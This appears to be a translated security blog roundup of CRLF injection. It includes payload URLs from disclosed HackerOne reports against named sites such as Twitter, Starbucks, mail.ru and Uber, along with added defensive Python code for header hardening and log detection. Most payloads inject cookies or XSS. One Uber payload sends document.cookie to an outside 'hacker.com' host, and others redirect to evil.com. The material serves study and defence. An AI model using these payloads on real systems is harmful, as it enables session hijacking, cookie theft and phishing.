CRLF injection in its many forms, as seen in HackerOne's disclosed reports
A roundup of the various forms CRLF injection takes.
CRLF is short for Carriage-Return Line-Feed: a carriage return (CR, ASCII 13, \r, %0d) followed by a line feed (LF, ASCII 10, \n, %0a).
In an HTTP message, the status line and each header line are terminated by CRLF, and a single blank line separates the headers from the body. CRLF injection happens when a web application does not strictly validate user input, so an attacker can inject CRLF characters and achieve HTTP response splitting.
In other words, the practical effect of CRLF injection is that a payload added to the request causes the injected header, or header value, to appear in the response.
The common exploitation scenario is a phishing link that injects a cookie or a special header, which the attacker lures a user into clicking. In many cases CRLF injection can be turned into XSS.
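To make the mechanism concrete from the defender's side, here is an added example (not code from the original post or from any of the reports below): a redirect handler that writes a user-controlled value into the Location header, shown in its vulnerable and hardened forms, plus a minimal response parser that shows what a client would see. The input value is constructed in the shape of the first payload in the list; the function names are the example's own.

```python
"""Added example, not from the original post: a redirect handler that writes
user input into a header, shown vulnerable and hardened, with a minimal
parser to show what a client would see."""
from urllib.parse import unquote

# Constructed input in the shape of report 1038594's payload: the value a
# user-controlled "next" parameter might carry after the server decodes it.
INJECTED = "/home" + unquote("%0D%0ASet-Cookie:crlfinjection=crlfinjection")


def _redirect_head(location: str) -> bytes:
    """Assemble a 302 response by string concatenation, as hand-rolled
    servers and proxies often do."""
    head = (
        "HTTP/1.1 302 Found\r\n"
        f"Location: {location}\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    )
    return head.encode("latin-1")


def build_redirect_vulnerable(location: str) -> bytes:
    """Vulnerable: the value is interpolated verbatim, so a CR LF inside it
    ends the Location line and whatever follows becomes a new header (or,
    after a second CR LF, the response body)."""
    return _redirect_head(location)


def build_redirect_safe(location: str) -> bytes:
    """Hardened: reject CR and LF before the value reaches the header.
    Most framework header APIs do this for you; the check matters wherever
    headers are assembled from strings by hand."""
    if "\r" in location or "\n" in location:
        raise ValueError("CR/LF not allowed in a header value")
    return _redirect_head(location)


def rejects(location: str) -> bool:
    """True if the hardened builder refuses the value."""
    try:
        build_redirect_safe(location)
    except ValueError:
        return True
    return False


def parse_head(raw: bytes):
    """Split a raw response the way a client does: status line, then one
    header per CR LF, then the body after the first blank line."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers: dict[str, list[str]] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers, body


if __name__ == "__main__":
    status, headers, _ = parse_head(build_redirect_vulnerable(INJECTED))
    # The injected Set-Cookie now appears to the client as a real header.
    print(status, headers)
    print("hardened builder rejects the value:", rejects(INJECTED))
```

Note that the vulnerable response carries the injected Set-Cookie alongside the legitimate Location; a lone %0d or %0a (as in several reports below) is enough on servers and clients that tolerate a bare CR or LF as a line break, which is why the hardened check refuses both characters rather than only the pair.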
[Figure: HackerOne search results for disclosed CRLF reports]
The payloads from the disclosed reports are collected below (the number in brackets is the HackerOne report id):
[1038594] https://www.epay.fas.gsa.gov/%0D%0ASet-Cookie:crlfinjection=crlfinjection
[446271] https://ads.twitter.com/subscriptions/mobile/landing?t=%0d%0aSet-Cookie:%20csrf_id=injection%3b
[191380] https://ton.twitter.com/1.1/ton/data/dm/x/%E5%98%8A%E5%98%8Dset-cookie%3A%20test%3Dtest%3B%20Domain%3D.twitter.com%3B%20Path%3D%2F%3B%20Expires%3DSat%2C%2015-Dec-2018%2009%3A45%3A55%20UTC
[52042] https://twitter.com/i/safety/report_story?next_view=report_story_start&source=reporttweet&reported_user_id=1&reporter_user_id=1&is_media=true&is_promoted=true&reported_tweet_id=%E5%98%8A%E5%98%8DSet-Cookie:%20test
[192667]
Chrome PoC: http://stagecafrstore.starbucks.com/%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
FireFox PoC: http://stagecafrstore.starbucks.com/%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
[237357] https://vpn.bitstrips.com/__session_start__/%0aSet-Cookie:malicious_cookie1
[335599] https://mcs.mail.ru/auth/oidc/login?response_type=code&scope=userinfo&client_id=iaas.mail.ru&state=k1qOT59-VhrTIe177aP0PXOouig&redirect_uri=%0d%0aContent-Length:%200%0d%0a%0d%0a9%0d%0a%0d%0a%3Chtml%3E%3Cmarquee%3E%3Cb%3ETEST%3C/b%3E%3C/marquee%3E%3C/html%3E&nonce=ENHHnrgXnfxv0oBAGRKfaXSQOk5VMyA2MT9KCcZSlCM
[177624] https://team.badoo.com/%0d%0adata:text/html;text,%3Csvg%2fonload%3Dprompt%281%29%3E
[53843] https://twitter.com/i/safety/report_story?next_view=report_story_start&source=reporttweet&reported_user_id=1&reporter_user_id=1&is_media=true&is_promoted=true&reported_tweet_id=+++++++++++……set-cookie:a
// This one is an overflow bug; the payload is abbreviated here because the run of + characters is very long. See the report for the full payload.
[192749]
Chrome PoC: http://newscdn.starbucks.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2f%2e%2e
FireFox PoC: http://newscdn.starbucks.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2e
[217058] https://info.hacker.one/%0d%0a%09headername:%20headervalue
[231508] https://vpn.corp.cuvva.com/__session_start__/%0aSet-Cookie:NEW_COOKIE123
[145128] http://account-global.ubnt.com/%3f%0dSet-Cookie:crlf=injection%3bdomain=.ubnt.com%3b
[39181] http://www.vimeopro.com/crlftest%0dSet-Cookie:test=test;domain=.vimeopro.com //works in any browser except Firefox
[171473] https://bi.owox.com/%0d%0aMyheader:NewHeader
[234758] https://vpn.mixmax.com/__session_start__/%0aSet-Cookie:malicious_cookie1
[121489] https://verkkopalvelu.lahitapiola.fi/a6/VerkkokauppaYTWAR/YT/Etusivu.jsf?productMode=YT&locale=fi<app=LT_Yksityistapaturmalaskuri&p=1412889500323ew2du7e081azeza%22%27%3E%3C%0D%0A+%0D%0A+%3Csvg/onload=alert%28document.domain%29%3E&selectedLanguage=fi&selectedArea=
[183796]
https://verkkopalvelu.lahitapiola.fi/a6/VerkkokauppaYTWAR/YT/Etusivu.jsf?productMode=YT&locale=fi<app=LT_Yksityistapaturmalaskuri&p=1412889500323ew2du7e081azeza%22%27%3E%3C%0D%0A+%0D%0A+%3Csvg/onload=alert%28/Xssed_By_G3nt3lman/%29%3E&selectedLanguage=fi&selectedArea=
https://verkkopalvelu.lahitapiola.fi/a6/ajoneuvolaskin/MA/Etusivu.jsf?productMode=YT&locale=fi<app=LT_Yksityistapaturmalaskuri&p=1412889500323ew2du7e081azeza%22%27%3E%3C%0D%0A+%0D%0A+%3Csvg/onload=alert%28/Xssed_By_G3nt3lman/%29%3E&selectedLanguage=fi&selectedArea=
https://verkkopalvelu.lahitapiola.fi/a6/ajoneuvolaskin/MA/Etusivu.jsf?productMode=YT&locale=fi<app=LT_Yksityistapaturmalaskuri&p=1412889500323ew2du7e081azeza"'><%0D%0A+%0D%0A+<svg/onload=document.location='http://evil.com'>&selectedLanguage=fi&selectedArea=
https://verkkopalvelu.lahitapiola.fi/a6/VerkkokauppaYTWAR/YT/Etusivu.jsf?productMode=YT&locale=fi<app=LT_Yksityistapaturmalaskuri&p=1412889500323ew2du7e081azeza"'><%0D%0A+%0D%0A+<svg/onload=document.location='http://evil.com'>&selectedLanguage=fi&selectedArea=
[25275] http://greenhouse.io/%0d%0aSet-Cookie:test=test;domain=.greenhouse.io
[39261] https://monitor.sjc.dropbox.com/crlf%0dSet-Cookie:test=test;domain=.dropbox.com
[181939]
POST /tests/ HTTP/1.1
Host: qpt.mail.ru
Content-Type: application/x-www-form-urlencoded
Content-Length: 245
action=answer&test_id=149&qpt_question_url=http%3A%2F%2Fcard.krugdoveriya.mail.ru/%0aSet-Cookie=test=test%3bdomain=.mail.ru%3b&qpt_result_url=http%3A%2F%2Fcard.krugdoveriya.mail.ru%2Ftest.html&question_id=1406&qpt_test_state=1406%3A0&answer=6449
[114198] https://touch.lady.mail.ru/%0aSet-Cookie:csrftoken=x;domain=.mail.ru;
[154306] https://api.owncloud.org/%23%0dSet-Cookie:crlf=injection2;domain=.owncloud.org;
[67386]
http://my.mail.ru/crlftest%0dSet-Cookie:crlf=inj6;domain=.mail.ru;path=/;/
http://m.my.mail.ru/crlftest%0dSet-Cookie:crlf=inj4;domain=.mail.ru;path=/;/
https://mir.mail.ru/crlftest%0dSet-Cookie:crlf=inj3;domain=.mail.ru;path=/;/
https://blog.mail.ru/crlftest%0dSet-Cookie:crlf=inj5;domain=.mail.ru;path=/;/
https://blogs.mail.ru/crlftest%0dSet-Cookie:crlf=inj7;domain=.mail.ru;path=/;/
https://www.video.mail.ru/crlftest%0dSet-Cookie:crlf=inj2;domain=.mail.ru;path=/;/
[79552] http://gratipay.com/%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
[99268] https://otus.p.mail.ru/brat/ajax.cgi?action=downloadFile&collection=/&detailed=True&dir=True&extension=xml&filters=content::content_reference::omission::distortion::nonsense::inexact::unclear::content_cohesion::ThemeRheme::logic::content_pragmatics::register::use::&protocol=1&document=%0d%0aCRLF_Vulnerabled:true%00
[154275] http://doc.owncloud.org/%23%0dSet-Cookie:crlf=injection;domain=.owncloud.org;
[15492]
http://corp.mail.ru/%0dSet-Cookie:test=test;domain=.mail.ru;
http://corp.mail.ru/%0dSet-Cookie:csrftoken=x;domain=.mail.ru;
[332708] https://dl.beepcar.ru/qwerty%0ASet-Cookie:%20test=qwerty;domain=.beepcar.ru
[66257] https://s.mail.ru/test%0dSet-Cookie:crlf=injection;domain=.mail.ru;
[138332] http://torg.mail.ru//xxx%0ASet-Cookie:test=test;domain=.mail.ru
[36105] http://ishop.qiwi.com/test%0dSet-Cookie:test2=test;domain=.qiwi.com
[66386]
http://www.myshopify.com/xxcrlftest%0aSet-Cookie:test=test3;domain=.myshopify.com;
https://www.blackfan.myshopify.com/xxx%0aSet-Cookie:test=test2;domain=.myshopify.com;
[140851] https://sales.mail.ru/media/%0ASet-Cookie:test=test?foo
[66391] https://engineeringblog.yelp.com/xxcrlftest%0d%0aSet-Cookie:%20test=test;domain=.yelp.com
[125984]
https://developer.uber.com/dashboard/%0d%0aContent-Type: text/html%0d%0aHTTP/1.1 200 OK%0d%0aSet-Cookie: oauth2_sid="r0Fs96ZB7tKfqSQ56jY7IlReA3wuF3o4/cLwQ02Pn8hdWLEfnkcD5Nc9ITruyiyUlNOTXu/le7IQLC9tNdvdEoiZYPZC3OXa7ZNQU4sT9ZGFQzF3kSyL8c8BgGGEWqH6"%0d%0a%0d%0a%3Chtml%3EHacker Content%3C/html%3E%0d%0a%0d%0a%3Cscript%3Ealert("Injected js")%3C/script%3E%0d%0a%0d%0a<!- //Jianshu's editor dropped one - here; the original ends with two of them
https://developer.uber.com/dashboard/%0d%0aContent-Type: text/html%0d%0aHTTP/1.1 200 OK%0d%0aSet-Cookie: oauth2_sid="r0Fs96ZB7tKfqSQ56jY7IlReA3wuF3o4/cLwQ02Pn8hdWLEfnkcD5Nc9ITruyiyUlNOTXu/le7IQLC9tNdvdEoiZYPZC3OXa7ZNQU4sT9ZGFQzF3kSyL8c8BgGGEWqH6"%0d%0a%0d%0a%3Chtml%3EHacker Content%3C/html%3E%0d%0a%0d%0a%3Cscript%3Evar+img=new+Image();img.src="http://www.hacker.com/incoming.php?coo="%20+%20document.cookie;%3C/script%3E%0d%0a%0d%0a<!- //Jianshu's editor dropped one - here; the original ends with two of them
[13314] https://crowdin.khanacademy.org/page/in-context-localization?email=%0d%0a%20InjectedBy:BigBear
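The list above shows the encodings that actually reached servers: the full %0d%0a pair, a lone %0d or %0a, and in the two Twitter reports (191380, 52042) the characters %E5%98%8A%E5%98%8D, which decode to U+560A and U+560D. The reason those two work is that a backend narrowing each code point to its low byte sees 0x0A and 0x0D, i.e. LF and CR. The added example below (not code from the original post or from any report) is a log-side detector that flags request targets carrying any of these indicators and names the header that follows the break, run over constructed access-log lines modelled on the payload shapes above. It generalises the Twitter trick to any non-ASCII code point whose low byte is CR or LF; the log format and function names are the example's own.

```python
"""Added example, not from the original post: a detector that flags request
targets carrying CRLF-injection indicators, run over constructed log lines."""
import re
from typing import Optional
from urllib.parse import unquote

# Constructed access-log lines (not from any real server), modelled on the
# payload shapes collected above. The first four are probes; the last two are
# benign (the fifth decodes to ordinary Chinese text, not a control character).
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /%0D%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1" 302 0
203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /crlftest%0dSet-Cookie:test=test;domain=.example.com HTTP/1.1" 302 0
203.0.113.5 - - [01/Jan/2024:10:00:02 +0000] "GET /__session_start__/%0aSet-Cookie:malicious_cookie1 HTTP/1.1" 302 0
203.0.113.5 - - [01/Jan/2024:10:00:03 +0000] "GET /1.1/ton/data/dm/x/%E5%98%8A%E5%98%8Dset-cookie%3A%20test%3Dtest HTTP/1.1" 200 0
203.0.113.5 - - [01/Jan/2024:10:00:04 +0000] "GET /products?page=2&sort=%E4%BD%A0%E5%A5%BD HTTP/1.1" 200 512
203.0.113.5 - - [01/Jan/2024:10:00:05 +0000] "GET /static/app.js HTTP/1.1" 200 1024
"""

REQUEST_LINE = re.compile(r'"(?:[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# A header-looking token right after a CR or LF (optionally preceded by
# whitespace, which also covers the %09 continuation seen in report 217058).
HEADER_AFTER_BREAK = re.compile(r"[\r\n]\s*([A-Za-z][A-Za-z0-9-]*)\s*:")


def fold_low_byte(ch: str) -> str:
    """Map a non-ASCII code point whose low byte is CR or LF (e.g. U+560A and
    U+560D from the Twitter reports) to that control character, which is what
    a backend that narrows code points to one byte would see."""
    cp = ord(ch)
    if cp > 0x7F and (cp & 0xFF) in (0x0A, 0x0D):
        return chr(cp & 0xFF)
    return ch


def crlf_indicators(target: str) -> list[str]:
    """Return the CRLF-injection indicators found in a percent-encoded
    request target, or an empty list for a clean one."""
    decoded = unquote(target)
    found = []
    if "\r" in decoded:
        found.append("CR")
    if "\n" in decoded:
        found.append("LF")
    for ch in decoded:
        cp = ord(ch)
        if cp > 0x7F and (cp & 0xFF) in (0x0A, 0x0D):
            found.append(f"U+{cp:04X} (low byte {cp & 0xFF:#04x})")
    return found


def injected_header(target: str) -> Optional[str]:
    """Name of the header that follows the injected line break, if any."""
    normalised = "".join(fold_low_byte(ch) for ch in unquote(target))
    m = HEADER_AFTER_BREAK.search(normalised)
    return m.group(1) if m else None


def scan_log(text: str) -> list[dict]:
    """Scan access-log text and return one record per suspicious request."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        target = m.group("target")
        indicators = crlf_indicators(target)
        if indicators:
            hits.append({"target": target, "indicators": indicators,
                         "header": injected_header(target)})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Flagging on the decoded target rather than on the literal substring "%0d%0a" is what makes the lone-CR, lone-LF and Unicode variants visible; the header name in each hit (Set-Cookie in the constructed probes) is the quickest way to triage which responses need checking.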
Originally published on FreeBuf.COM